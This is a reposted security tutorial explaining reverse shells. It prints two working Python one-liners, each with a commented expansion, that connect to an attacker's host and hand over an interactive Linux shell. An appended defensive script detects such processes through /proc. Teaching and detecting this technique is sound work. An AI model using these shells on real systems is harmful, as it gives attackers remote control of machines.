[Tut] Python One Line Reverse Shell - xSicKxBot - 07-30-2020
Python One Line Reverse Shell
<div><p>This article will be fun! You’ll learn about an important concept in security: reverse shells. You’ll also learn how to create reverse shells in Python in a single line of code. So, let’s start with the big question:</p>
<h2>What is a Reverse Shell?</h2>
<p>Here’s the definition of a Reverse Shell:</p>
<p class="has-pale-cyan-blue-background-color has-background">A <strong>reverse shell</strong> is used by hackers to gain access to a target machine. The target machine opens a shell and connects out to the attacking machine. The attacking machine receives the connection (listening on a given port) and is now able to access the target computer. To set up a reverse shell, a hacker must already be able to execute code on the target machine. Reverse shells are also used by security engineers to test and prevent reverse shell attacks.</p>
<p>You can read more <a href="https://resources.infosecinstitute.com/icmp-reverse-shell/#gref" target="_blank" rel="noreferrer noopener" title="https://resources.infosecinstitute.com/icmp-reverse-shell/#gref">here</a>. In this tutorial, you’ll learn how to create a reverse shell in one line of Python.</p>
<h2>Method 1</h2>
<p>I found this code in a <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" target="_blank" rel="noreferrer noopener" title="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">blog</a> thread.
You can run it from any computer with Python installed and visible from your current location:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</pre>
<p>But you should never execute code that’s copied and pasted from an Internet source. What if the code removes all files from your computer?</p>
<p>Let’s look at this code as a Python multi-liner so that you can understand it better:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import socket,subprocess,os

# Open a TCP connection to the listening machine
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.0.0.1",1234))
# Point stdin (0), stdout (1) and stderr (2) at the socket
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# Start an interactive shell, which inherits those descriptors
p=subprocess.call(["/bin/sh","-i"])
</pre>
<p>As you see, the code opens a socket (which is an entry point for a connection), <a href="https://www.tutorialspoint.com/python/os_dup2.htm" target="_blank" rel="noreferrer noopener" title="https://www.tutorialspoint.com/python/os_dup2.htm">duplicates file descriptors</a> so that standard input, output and error (descriptors 0, 1 and 2) all refer to the socket, and calls a <a href="http://etutorials.org/Linux+systems/how+linux+works/Chapter+1+The+Basics/1.1+About+bin+sh/" target="_blank" rel="noreferrer noopener" title="http://etutorials.org/Linux+systems/how+linux+works/Chapter+1+The+Basics/1.1+About+bin+sh/">Linux shell</a>.
Thus, it will only run on Linux-based systems.</p>
<h2>Method 2</h2>
<p>In <a href="https://gist.github.com/lucasgates/0c6330c582d0ccf52fad129d5e7e9de7" target="_blank" rel="noreferrer noopener" title="https://gist.github.com/lucasgates/0c6330c582d0ccf52fad129d5e7e9de7">this</a> GitHub thread, I found another one-liner that opens a reverse shell:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("Kali-IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'</pre>
<p>Written as the equivalent multi-liner, the code is easier to understand:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">import pty
import socket,os

# Same socket and dup2 setup as in Method 1
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("Kali-IP",443))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# pty.spawn runs the shell attached to a pseudo-terminal
pty.spawn("/bin/bash")
</pre>
<p>It’s very similar to the above code but uses the <code>pty</code> module to create the shell.</p>
</div> https://www.sickgaming.net/blog/2020/07/30/python-one-line-reverse-shell/
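A defender's view of the pattern both methods share, as an added example that is not part of the original post: after the `os.dup2` calls, descriptors 0, 1 and 2 of the Python process (and, in Method 1, of the `/bin/sh` child) all point at one TCP socket, which Linux exposes under `/proc/<pid>/fd`. The code below flags such processes and resolves the peer address from `/proc/net/tcp`; the function names, PIDs, inode numbers and sample rows are constructed for illustration.

```python
import os
import re
import socket
import struct
from pathlib import Path

SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")  # how /proc/<pid>/fd/N names a socket

def stdio_socket_inode(fd_links):
    """Return the inode when fds 0, 1 and 2 all point at one socket, else None."""
    hits = [SOCKET_LINK.match(fd_links.get(fd, "")) for fd in (0, 1, 2)]
    inodes = {m.group(1) for m in hits if m}
    return inodes.pop() if all(hits) and len(inodes) == 1 else None

def remote_endpoints(proc_net_tcp):
    """Map socket inode -> peer 'ip:port' from /proc/net/tcp text (IPv4 only)."""
    peers = {}
    for cols in map(str.split, proc_net_tcp.splitlines()[1:]):  # row 0 is the header
        if len(cols) >= 10:
            ip_hex, port_hex = cols[2].split(":")               # rem_address column
            ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))  # little-endian host
            peers[cols[9]] = f"{ip}:{int(port_hex, 16)}"        # column 9 is the inode
    return peers

def scan(processes, proc_net_tcp):
    """processes: (pid, comm, {fd: link}) tuples. Returns (pid, comm, peer) findings."""
    peers = remote_endpoints(proc_net_tcp)
    return [(pid, comm, peers.get(inode, "unknown"))
            for pid, comm, links in processes
            if (inode := stdio_socket_inode(links)) is not None]

def live_processes(proc_root="/proc"):
    """Yield (pid, comm, fd links) for each process this user may inspect."""
    for p in Path(proc_root).glob("[0-9]*"):
        try:
            links = {fd: os.readlink(p / "fd" / str(fd)) for fd in (0, 1, 2)}
            yield int(p.name), (p / "comm").read_text().strip(), links
        except OSError:
            continue                                  # exited, or not permitted

# Constructed sample data (not from a real host).
SOCK = dict.fromkeys((0, 1, 2), "socket:[48211]")     # Method 1: python3 and sh share it
SAMPLE_PROCS = [(1187, "python3", SOCK), (1201, "sh", SOCK),
                (640, "nginx", {0: "/dev/null", 1: "socket:[20110]", 2: "socket:[20110]"}),
                (2210, "bash", dict.fromkeys((0, 1, 2), "/dev/pts/0"))]
SAMPLE_TCP = ("  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
              "   0: 0F02000A:A3C4 0100000A:04D2 01 00000000:00000000 00:00000000 00000000  1000        0 48211\n")

if __name__ == "__main__":                            # live scan on a Linux host
    print(scan(live_processes(), Path("/proc/net/tcp").read_text()))
```

inetd-style services legitimately run with a socket on all three descriptors, so findings are triage candidates rather than verdicts. IPv6 peers are listed in `/proc/net/tcp6` and show up as `unknown` here.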